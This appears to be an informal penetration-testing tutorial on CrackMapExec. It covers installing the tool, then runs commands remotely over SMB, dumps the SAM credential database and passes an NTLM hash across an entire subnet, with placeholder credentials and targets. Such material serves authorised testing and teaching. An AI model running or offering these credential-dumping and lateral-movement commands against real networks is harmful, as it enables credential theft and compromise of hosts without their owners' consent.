

Going down the range.

So let's discuss CrackMapExec (CME) a bit.

The more targeted your user/password or hash list, the more targeted (and the quieter) your attack.
CME is the go-to tool on internal engagements for large sweeps and credential-spray attacks, where one password or hash is tried against many accounts and hosts across a variety of protocols.

I encourage you to do some research on which protocols crackmapexec supports! The examples below all use the smb module; winrm, mssql, ldap and ssh modules are also available.

+ Here's where you're going to get it:

+ Python Package:
python3 -m pip install pipx
pipx ensurepath
pipx install crackmapexec

+ Install From Source:
apt-get install -y libssl-dev libffi-dev python-dev build-essential
git clone --recursive
cd CrackMapExec
poetry install
poetry run crackmapexec

--> Execute 'whoami'. In CME 5.x every command names the protocol (smb here) and a target: an IP, a hostname, a CIDR range or a file of targets.
crackmapexec smb <targets> -u Administrator -p 'PASS' -x whoami
--> Query the domain's Administrator account. --exec-method smbexec forces smbexec instead of the default wmiexec.
crackmapexec smb <targets> -u 'Administrator' -p 'PASS' -x 'net user Administrator /domain' --exec-method smbexec
--> PowerShell version table (-X runs a PowerShell command, -x runs a cmd command).
crackmapexec smb <targets> -u Administrator -p 'PASS' -X '$PSVersionTable'
--> List logged-on users (--lusers enumerates active sessions, not the local account database).
crackmapexec smb <targets> -u 'Administrator' -p 'PASS' --lusers
--> Dump the SAM database. Needs local admin; --local-auth authenticates against the host's local SAM rather than the domain.
crackmapexec smb <targets> -u 'Administrator' -p 'PASS' --local-auth --sam
--> Let's pass the hash against an entire subnet! -H takes LM:NT or just the NT hash; 10.0.0.0/24 stands in for your range.
crackmapexec smb 10.0.0.0/24 -u 'Administrator' -H 'LM:NTLM' --local-auth

Don't mind me - just pwning an entire network in one sweep...
